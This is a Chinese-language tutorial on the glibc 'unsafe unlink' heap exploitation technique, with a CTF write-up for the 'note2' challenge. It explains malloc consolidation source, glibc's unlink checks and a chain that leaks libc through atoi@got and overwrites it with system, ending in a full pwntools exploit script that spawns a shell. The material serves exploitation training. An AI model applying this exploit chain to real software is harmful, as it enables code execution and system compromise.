unsafe unlink
unsafe unlink
0x00 unlink介绍
unlink就是一个“glibc malloc”的内存回收机制,顾名思义,把一个free的chunk从链表中拆取出来。显然,这种利用Unlink的手段针对的是除fastbin以外的其他几个bin链,因为fastbin是个单链表。
什么场合会用到unlink?当需要合并双向链表中相邻的两个free chunk的时候就要用到unlink。这里的合并又分向后合并、向前合并两种情况。
unlink攻击技术就是利用unlink过程把free函数的got表项覆盖成为shellcode地址。在后续调用free的时候就可以执行shellcode代码。
0x01 unlink过程源码介绍
一旦涉及到free内存,那么就意味着有新的chunk由allocated状态变成了free状态,此时glibc malloc就需要进行合并操作,就是包括前面所说的两种合并情况。
在这里通过libc源码得到更好的理解,注意以下合并源码操作的chunk都是非 mmaped 块
向前合并
#!c
/*malloc.c int_free函数中*/
/*这里p指向当前malloc_chunk结构体,bck和fwd分别为当前chunk的后一个和前一个free chunk*/
static void _int_free (mstate av, mchunkptr p, int have_lock)
{
...
//判断是否为mmap分配的chunk
else if (!chunk_is_mmapped(p)) {
...
nextchunk = chunk_at_offset(p, size);
...
nextsize = chunksize(nextchunk);
/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
//修改指向当前chunk的指针,指向前一个chunk。
p = chunk_at_offset(p, -((long) prevsize));
unlink(p, bck, fwd);
}
//相关函数说明:
/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))
/*unlink操作的实质就是:将P所指向的chunk从双向链表中移除,这里BK与FD用作临时变量*/
#define unlink(P, BK, FD) {
FD = P->fd;
BK = P->bk;
FD->bk = BK;
BK->fd = FD;
...
}
程序的大概逻辑就是先检测free chunk 的上一个chunk是否为mmaped chunk,通过chunk_is_mmapped(p)判断。再者检测前一个chunk是否为free状态,通过prev_inuse(p)来知晓。
注意在默认情况下,堆内存的第一个chunk的prev_inuse位永远是1,表示被分配的状态。第一个的前一个chunk是不存在的,但这不影响prev_inuse位想表示出的状态。
-
当前一个chunk是allocated状态,显然就不合条件跳过if
-
当前一个chunk是free状态,就开始向前合并:
- 把size扩大为size+prev_size
- 修改指向当前chunk的指针p,让其指向前一个chunk
- 使用unlink宏,将p所指向的合并后的freechunk从双向列表中移除
向后合并
#!c
……
/*这里p指向当前chunk*/
nextchunk = chunk_at_offset(p, size);
……
nextsize = chunksize(nextchunk);
……
if (nextchunk != av->top) {
/* get and clear inuse bit */
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);//判断nextchunk是否为free chunk
/* consolidate forward */
if (!nextinuse) { //next chunk为free chunk
unlink(nextchunk, bck, fwd); //将nextchunk从链表中移除
size += nextsize; // p还是指向当前chunk只是当前chunk的size扩大了,这就是向后合并!
} else
clear_inuse_bit_at_offset(nextchunk, 0);
……
}
/*unlink操作的实质就是:将P所指向的chunk从双向链表中移除,这里BK与FD用作临时变量*/
#define unlink(P, BK, FD) {
FD = P->fd;
BK = P->bk;
FD->bk = BK;
BK->fd = FD;
...
}
与向前合并不一样的就是对指针的操作,这里用的是nextchunk而不再是p指针,p还是指向当前freechunk,操作的nextchunk指向p指向的下一个freechunk,总体操作上与向前合并大致一致。
- 当next chunk是free状态,开始向后合并
- 将nextchunk从链表中移除
- 把szie扩大为size+nextsize
以上就是两种合并的具体介绍
接下来就要了解合并后(或者因不满足条件没合并)的chunk是如何进一步处理?
当然这对攻击来说并没有多大关系,但这里扩展了解一下:
#!c
/*
Place the chunk in unsorted chunk list. Chunks are not placed into regular bins until after they have been given one chance to be used in malloc.
*/
bck = unsorted_chunks(av); //获取unsorted bin的第一个chunk
/*
/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
#define unsorted_chunks(M) (bin_at (M, 1))
*/
//把p插在头节点与第一个chunk之间
fwd = bck->fd;
……
p->fd = fwd;
p->bk = bck;
if (!in_smallbin_range(size))
{
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}
bck->fd = p;
fwd->bk = p;
set_head(p, size | PREV_INUSE);//设置当前chunk的size,并将前一个chunk标记为已使用
set_foot(p, size);//将后一个chunk的prev_size设置为当前chunk的size
/*
/* Set size/use field */
#define set_head(p, s) ((p)->size = (s))
/* Set size at footer (only when chunk is not in use) */
#define set_foot(p, s) (((mchunkptr) ((char *) (p) + (s)))->prev_size = (s))
*/
上述代码的逻辑大概就是:把当前chunk插入到unsorted bin的第头节点与第1个节点之间。分别更改头节点的bk与第一个节点(现在第2节点)的fd,都改成p,设置当前chunk的size,并将前一个chunk标记为已使用,再将后一个chunk的prev_size设置为当前chunk的size。这样就完善成一个新的unsorted链表。
注意:上一段中描述的”前一个“与”后一个“chunk,是指的由chunk的prev_size与size字段隐式连接的chunk,即它们在内存中是连续、相邻的!而不是通过chunk中的fd与bk字段组成的bin(双向链表)中的前一个与后一个chunk,切记!
0x02 实验1
前面已经很详细的讲解了实现unlink以及其上下文的过程。
看一下下面这道题:
程序源代码:
#!c
/*
Heap overflow vulnerable program.
*/
#include <stdlib.h>
#include <string.h>
int main( int argc, char * argv[] )
{
char * first, * second;
/*[1]*/ first = malloc( 666 );
/*[2]*/ second = malloc( 12 );
if(argc!=1)
/*[3]*/ strcpy( first, argv[1] );
/*[4]*/ free( first );
/*[5]*/ free( second );
/*[6]*/ return( 0 );
}
很明显存在一个堆溢出的漏洞,当输入的argv[1]的大小比first所申请到的666字节还要大的时候,就可以把接下去的内容进行覆盖。而实现攻击操作的核心就在于unlink攻击。
假设要覆盖的second chunk header的数据如下(这里告知一下是在32位系统):
1)prev_size =一个偶数,这样就使得p位是0表示first chunk处于free状态。
2)nextszie =-4
3)fd = free@got的地址 - 12,
4)bk = shellcode地址
所以当程序在第4步,调用free(first)后发生什么?向后or向后合并?
frist是处于链表的第一个chunk,前面头节点永远是allocated状态。不会发生向前合并。
那向后合并呢?结合前面的源码,nextchunk就是second chunk。在检测nextchunk是否是free状态的代码如下
#!c
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
这里inuse_bit_at_offset宏定义如下:
/* check/set/clear inuse bits in known places */
#define inuse_bit_at_offset(p, s) \
(((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE)
从上面的代码可以知道,它把nextchunk指针加了一个nextsize,指向了nextchunk的下一个chunk,就是second chunk的下个chunk,按照正常来说就是top块。但我们把nextsize设置成-4,这样在检测的时候,gllibc malloc 就会把second chunk的prev_size字段看成second chunk的next chunk的size字段。而我们已经将second chunk的prev_size字段设置为一个偶数,这样一来inuse_bit_at_offset(nextchunk, nextsize)获得的nextchunk的prev_insue位是0,即nextchunk为free状态,就是second chunk是free状态。
这样就符合向后合并的要求,就要调用unlink函数——unlink(secondchunk, bck, fwd)。
还记得之前的unlink的源代码吗,我把他们原意加以注释
#define unlink(P, BK, FD) {
FD = P->fd; // 取前一个chunk
BK = P->bk; //取后一个chunk
FD->bk = BK; //前一个chunk的bk指向后一个chunk
BK->fd = FD; //后一个chunk的fd指向前一个chunk //这样就把链表重新接上,取出unlinked节点
...
}
操作开始了,构造的数据要发挥巨大作用了,盯紧这三个参数
P=secondchunk, BK=bck, FD=fwd
- FD = P->fd = free@got - 12
- BK = P->bk = shellcode地址
- FD->bk = (free@got - 12)->bk = free@got = BK = shellcode地址
- BK->fd = shellcode地址->fd = FD=free@got - 12
画个图
图一画一些关键的就一目了然了。free@got-12就是把这一段空间当作chunk赋予的首地址指针。这个“chunk”的bk自然就是free的地址。所以free的地址在执行完unlink之后就会被赋值为shellcode的地址。所以在之后执行第5步free(second)就是在调用sellcode。
0x03 unlink攻击对抗
glibc malloc在不断更新,添加了如下的检查机制来防止unlink攻击技巧。
-
不允许double free:对一个已经free的chunk进行再次的free是不允许的。通过检查prev_inuse来实现。
所以对于这道题攻击者将size设置成为-4时,就意味着size的prev_inuse位是0,那么在free(first)的时候检查second的size域,发现处于free状态,立马报错。
if (__glibc_unlikely (!prev_inuse(nextchunk)))
{
errstr = "double free or corruption (!prev)";
goto errout;
-
invalid nextchunk size :nextchunk的大小应该在8(16)字节到arena的全部系统内存之间。
所以在设置second的size为-4的时候就绕不过nextchunk的size检查,报错
if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (nextsize >= av->system_mem, 0))
{
errstr = "free(): invalid next size (normal)";
goto errout;
}
-
双向列表指针被破坏:在执行unlink操作的时候,链表中的前一个chunk的fd和下一个chunk的bk应该指向当前即将unlink的chunk
很显然,替换second的fd和bk内容会立马影响,报错
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P);
在有上述unlink防御的操作之下,攻击者还是能找到漏洞,攻击者的脑洞永远比天大。看一下下面这道题。
0x04 实验2--note2
0x000 试玩
root@ubuntu20:~/ln2# ./note2
Input your name:
aa
Input your address:
aa
1.New note
2.Show note
3.Edit note
4.Delete note
5.Quit
option--->>
1
Input the length of the note content:(less than 128)
16
Input the note content:
dfnasdlkfna
note add success, the id is 0
1.New note
2.Show note
3.Edit note
4.Delete note
5.Quit
option--->>
2
Input the id of the note:
0
Content is dfnasdlkfna
1.New note
2.Show note
3.Edit note
4.Delete note
5.Quit
option--->>
3
Input the id of the note:
0
do you want to overwrite or append?[1.overwrite/2.append]
可以看到是很经典的菜单,是一道经典的堆题。
先ida反编译
1.main函数:
void __fastcall main(__int64 a1, char **a2, char **a3)
{
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
alarm(0x3Cu);
puts("Input your name:");
getStr(name, 64LL, 10);//getStr是个自定义函数
puts("Input your address:");
getStr(addr, 96LL, 10);
while ( 1 )
{
switch ( menu() )
{
case 1:
new();
break;
case 2:
show();
break;
case 3:
edit();
break;
case 4:
del();
break;
case 5:
puts("Bye~");
exit(0);
case 6:
exit(0);
default:
continue;
}
}
}
getstr自定义,点击打开。
unsigned __int64 __fastcall getStr(char *a1, __int64 a2, char a3)
{
char buf; // [rsp+2Fh] [rbp-11h] BYREF
unsigned __int64 i; // [rsp+30h] [rbp-10h]
ssize_t v7; // [rsp+38h] [rbp-8h]
for ( i = 0LL; a2 - 1 > i; ++i )
{
v7 = read(0, &buf, 1uLL);
if ( v7 <= 0 )
exit(-1);
if ( buf == a3 )//buf不给读入a3内容
break;
a1[i] = buf;
}
a1[i] = 0;
return i;
}
可以看到这里定义的i是unsigned __int64无符号整型变量,而a2是__int64是有符号整型变量
当 a2 - 1 > i,他们进行比较的时候,C语言会把有符号的整型变量转变为无符号的变量进而进行比较。所以当a2可控,让a2=0时;a2-1将时负数,在转化为无符号的整型变量时将会变得很大,足以使得for的该条件永远成立。这就是整数溢出漏洞。
2.new函数的代码
void new()
{
unsigned int id; // eax
unsigned int size; // [rsp+4h] [rbp-Ch]
char *p; // [rsp+8h] [rbp-8h]
if ( (unsigned int)cnt <= 3 )//申请不超过4个chunk
{
puts("Input the length of the note content:(less than 128)");
size = getInt();
if ( size <= 0x80 )//申请的chunk大小不超过128
{
p = (char *)malloc(size);
puts("Input the note content:");
getStr(p, size, 10);
filter(p);//点开发现其功能是把%过滤
ptr[cnt] = p;//ptr[]数组里面存放chunk的返回指针
length[cnt] = size;//length[]数组存放chunk的size
id = cnt++;//会等于id = cnt;cnt++;
printf("note add success, the id is %d\n", id);
}
else
{
puts("Too long");
}
}
else
{
puts("note lists are full");
}
}
这里得getstr的size可控。那么当我们输入 size 为 0 时,glibc 根据其规定,会分配 0x20 个字节,但是程序读取的内容却并不受到限制,故而会产生堆溢出。
明确一点像出现得ptr、length、cnt等都是全局变量,他们的地址可以在bss看到
3.show函数代码
void show()
{
int idx; // [rsp+Ch] [rbp-4h]
puts("Input the id of the note:");
idx = getInt();
if ( idx >= 0 && idx <= 3 )//0-3
{
if ( ptr[idx] )
printf("Content is %s\n", ptr[idx]);//把指针也就是chunk的内容输出
}
}
4.edit函数代码
void edit()
{
char *v0; // rbx
int idx; // [rsp+8h] [rbp-E8h]
int choice; // [rsp+Ch] [rbp-E4h]
char *src; // [rsp+10h] [rbp-E0h]
__int64 size; // [rsp+18h] [rbp-D8h]
char dest[128]; // [rsp+20h] [rbp-D0h] BYREF
char *v6; // [rsp+A0h] [rbp-50h]
unsigned __int64 v7; // [rsp+D8h] [rbp-18h]
v7 = __readfsqword(0x28u);
if ( cnt )
{
puts("Input the id of the note:");
idx = getInt();
if ( idx >= 0 && idx <= 3 )
{
src = ptr[idx];//把chunk指针取出
size = length[idx];//对应size取出
if ( src )//判空
{
puts("do you want to overwrite or append?[1.overwrite/2.append]");
choice = getInt();
if ( choice == 1 || choice == 2 )
{
if ( choice == 1 )
dest[0] = 0;
else
strcpy(dest, src);//拷贝chunk中的数据
v6 = (char *)malloc(0xA0uLL);//临时申请一个大小为160字节的chunk
strcpy(v6, "TheNewContents:");
printf(v6);
getStr(v6 + 15, 144LL, 10);//从申请的chunk数据部分第15个字节以后,读入144个字节
filter(v6 + 15);
v0 = v6;//移交控制权
v0[size - strlen(dest) + 14] = 0;
//C 库函数 char *strncat(char *dest, const char *src, size_t n) 把src 所指向的字符串追加到 dest 所指向的字符串的结尾,直到 n 字符长度为止。
strncat(dest, v6 + 15, 0xFFFFFFFFFFFFFFFFLL);//将输入字符串追加到dest中数据后面
strcpy(src, dest);//再把完整的数据拷贝回chunk中
free(v6);//对临时chunk进行释放
puts("Edit note success!");
}
else
{
puts("Error choice!");
}
}
else
{
puts("note has been deleted");
}
}
}
else
{
puts("Please add a note!");
}
}
注意这里申请的临时chunk是0xa0固定大小。
在free之后并没有把指针清零,出现uaf漏洞。
5.del函数代码
void del()
{
int idx; // [rsp+Ch] [rbp-4h]
puts("Input the id of the note:");
idx = getInt();
if ( idx >= 0 && idx <= 3 )
{
if ( ptr[idx] )
{
free(ptr[idx]);//对chunk进行free
ptr[idx] = 0LL;//返回指针清零
length[idx] = 0LL;//长度清零
puts("delete note success!");
}
}
}
0x001 漏洞利用
思路如下:
-
绕过三个检查机制
-
创建3个chunk分别是chunk0、chunk1、chunk2。其中chunk0读入的是构造伪造的fake chunk的数据(包括chunk头和fd、bk域)。
-
为了堆溢出,输入chunk1的size是0,size虽是0但实际上在glibc malloc默认分配0x20大小的空间。申请完三个chunk后,对chunk1直接free,就会回收到fastbin链中去,再通过重新new,获得该空间的控制,就可以利用整数溢出,输入大于0x20字节的数据实现对chunk2头部的覆盖
-
最后free(chunk2),这样就会有unlink过程,在检查上一个chunk,即fake chunk的时候发现其满足条件,此时就会向前合并。
-
unlink为的不是要合并的结果;要的是中间巧妙的四句
FD = P->fd; BK = P->bk; FD->bk = BK; BK->fd = FD;严格来讲是前三句,简化就是P->fd->bk=P->bk,最后成功把指针指向修改
具体内存情况如下:
申请的三个chunk:
伪造后的chunk:
unlink后:
- unlink后实现对ptr指针的控制,使得ptr[0]=&ptr[0]-0x18,然后修改ptr[0][3]为atoi@got,让ptr[0]指向atoi@got,通过show函数就可以让atoi的真实地址输出,再结合偏移,就可以拿到libc的基地址,进而拿到system函数的基地址。
这里有个地方注意:
为什么chunk1不能第一遍new的时候,直接在输入内容覆盖,要放到fastbin里new回来再覆盖?
因为第一遍的时候chunk2还未申请,若直接覆盖,将会是改变top chunk的chunk头。而top_chunk的size也不是随意更改的,因为在sysmalloc中对这个值还要做校验
assert ((old_top == initial_top (av) && old_size == 0) ||
((unsigned long) (old_size) >= MINSIZE &&
prev_inuse (old_top) &&
((unsigned long) old_end & (pagesize - 1)) == 0));
/* Precondition: not enough current space to satisfy nb request */
assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
- 接下来就是通过修改ptr[0],就是atoi@got为system函数的地址,这样调用atoi的时候就是调用system。
- menu函数里面getint函数就有atoi调用,那么在要用户输入菜单选项的时候,直接输入"/bin/sh\0x00"将会执行system含函数并返回shell
完整脚本
from pwn import *
p = process("./note2")
elf = ELF("./note2")
libc = ELF("./libc-2.24.so")
# context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-v']
rv = p.recv
ru = p.recvuntil
sl = p.sendline
sla = p.sendlineafter
sd = p.send
sda = p.sendafter
def dbg(break_point):
gdb.attach(p, "b " + break_point)
def new_note(size, content):
sla("option--->>", "1")
sla("Input the length of the note content:(less than 128)", str(size))
sla("Input the note content:", content)
def delete_note(id):
sla("option--->", "4")
sla("Input the id of the note:", str(id))
def show_note(id):
sla("option--->", "2")
sla("Input the id of the note:", str(id))
def edit_note(id, option, content):
sla("option--->", "3")
sla("Input the id of the note:", str(id))
sla("[1.overwrite/2.append]", str(option))
sla("TheNewContents:", content)
sla("Input your name:", "Lantern")
sla("Input your address:", "Lantern")
# dbg("*0x000000000400B0F")
ptr = 0x602120
payload = b"a" * 8 + p64(0x61) + p64(ptr - 0x18) + p64(ptr - 0x10)
payload = payload.ljust(0x60, b'b')
new_note(0x80, payload) # 0
new_note(0, 'b') # 1
new_note(0x80, 'a') # 2
delete_note(1)
payload = b"b" * 16 + p64(0x80 + 0x20) + p64(0x90)
new_note(0, payload)
delete_note(2)
payload = b"a" * 0x18 + p64(elf.got['atoi'])
edit_note(0, 1 , payload)
show_note(0)
ru("Content is ")
atoi_address = u64(ru("\n", drop = True).ljust(8, b'\x00'))
log.success("atoi_address: " + hex(atoi_address))
libc.address = atoi_address - libc.symbols['atoi']
system_address = libc.symbols['system']
log.success("system_address: " + hex(system_address))
log.success("libc.address: " + hex(libc.address))
payload = p64(system_address)
edit_note(0, 1, payload)
sla("option--->>", "/bin/sh")
p.interactive()
